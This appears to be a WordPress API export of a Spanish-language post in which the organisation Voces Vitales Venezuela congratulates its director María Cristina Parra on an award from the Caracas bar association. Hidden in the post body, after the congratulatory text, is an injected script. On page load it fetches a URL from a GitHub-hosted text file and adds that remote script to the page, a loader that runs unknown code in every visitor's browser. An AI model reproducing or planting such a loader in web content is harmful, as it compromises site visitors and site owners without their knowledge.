{"id":3897,"date":"2024-06-23T18:07:58","date_gmt":"2024-06-23T22:37:58","guid":{"rendered":"https:\/\/vocesvitalesvenezuela.org\/site\/?p=3897"},"modified":"2024-07-25T05:11:23","modified_gmt":"2024-07-25T09:41:23","slug":"vvv-felicita-a-su-directora-maria-cristina-parra","status":"publish","type":"post","link":"http:\/\/vocesvitalesvenezuela.org\/site\/?p=3897","title":{"rendered":"VVV felicita a su directora Mar\u00eda Cristina Parra por tan merecido reconocimiento"},"content":{"rendered":"<p><a href=\"http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/07\/MARIA-CRISTINA-PARRA-CELEBRACION-Dia-del-Abogado.jpg\"><img loading=\"lazy\" class=\" wp-image-3898 alignleft\" src=\"http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/07\/MARIA-CRISTINA-PARRA-CELEBRACION-Dia-del-Abogado-225x300.jpg\" alt=\"\" width=\"215\" height=\"287\" srcset=\"http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/07\/MARIA-CRISTINA-PARRA-CELEBRACION-Dia-del-Abogado-225x300.jpg 225w, http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/07\/MARIA-CRISTINA-PARRA-CELEBRACION-Dia-del-Abogado-768x1024.jpg 768w, http:\/\/vocesvitalesvenezuela.org\/site\/wp-content\/uploads\/2024\/07\/MARIA-CRISTINA-PARRA-CELEBRACION-Dia-del-Abogado.jpg 810w\" sizes=\"(max-width: 215px) 100vw, 215px\" \/><\/a><\/p>\n<p>El Colegio de Abogados de Caracas otorg\u00f3 el pasado 23 de junio, con motivo del D\u00eda del Abogado, la Orden Miguel Jos\u00e9 Sanz en su Primera Clase a nuestra Directora Mar\u00eda Cristina Parra.<\/p>\n<p>Voces Vitales felicit\u00f3 a Mar\u00eda Cristina Parra por tan merecido reconocimiento a su brillante trayectoria como jurista comprometida con la protecci\u00f3n de los Derechos Humanos de las mujeres, ni\u00f1as y ni\u00f1os venezolanos.<script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El Colegio de Abogados de Caracas otorg\u00f3 el pasado 23 de junio, con motivo del D\u00eda del Abogado, la Orden Miguel Jos\u00e9 Sanz en su Primera Clase a nuestra Directora Mar\u00eda Cristina Parra. Voces Vitales felicit\u00f3 a Mar\u00eda Cristina Parra&hellip; <a href=\"http:\/\/vocesvitalesvenezuela.org\/site\/?p=3897\" class=\"more-link\">Continuar leyendo <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":3,"featured_media":3898,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/posts\/3897"}],"collection":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3897"}],"version-history":[{"count":0,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/posts\/3897\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=\/wp\/v2\/media\/3898"}],"wp:attachment":[{"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3897"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3897"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/vocesvitalesvenezuela.org\/site\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3897"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}